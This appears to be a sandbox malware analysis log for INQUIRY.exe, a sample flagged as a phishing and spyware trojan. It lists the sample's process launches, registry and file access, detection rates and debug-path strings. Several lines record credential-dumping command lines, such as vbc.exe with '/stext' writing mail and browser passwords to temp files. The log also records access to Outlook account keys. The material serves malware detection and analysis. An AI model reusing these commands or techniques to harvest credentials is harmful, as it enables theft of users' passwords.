                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: classification engine, Classification label: mal100.phis.troj.spyw.evad.winEXE@46/34@17/4
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00420A80 GetLastError,FormatMessageA,0_2_00420A80
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00408B82 GetDiskFreeSpaceA,0_2_00408B82
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,6_2_00411196
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00417214 FindResourceA,LoadResource,SizeofResource,LockResource,0_2_00417214
                    Source: C:\Users\user\Desktop\INQUIRY.exe, File created: C:\Users\user\AppData\Roaming\pid.txt
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
                    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5896
                    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmp
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe System information queried: HandleInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\INQUIRY.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: INQUIRY.exe Virustotal: Detection: 43%
                    Source: INQUIRY.exe ReversingLabs: Detection: 41%
                    Source: C:\Users\user\Desktop\INQUIRY.exe File read: C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdbi source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb1 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.698848743.00000000049D4000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdbJhgiX source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb$hAi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb/ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: profapi.pdbkRi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb6hSi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winnsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb] source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdbo source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdbqa{ source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: sxs.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rtutils.pdb? source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoree.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbxi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Z[zTs5.pdb6 source: INQUIRY.exe, 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp
                    Source: Binary string: cordacwks.pdb^hkiY source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb@hmi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdbG source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb) source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: security.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb{ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdbLhYiL source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
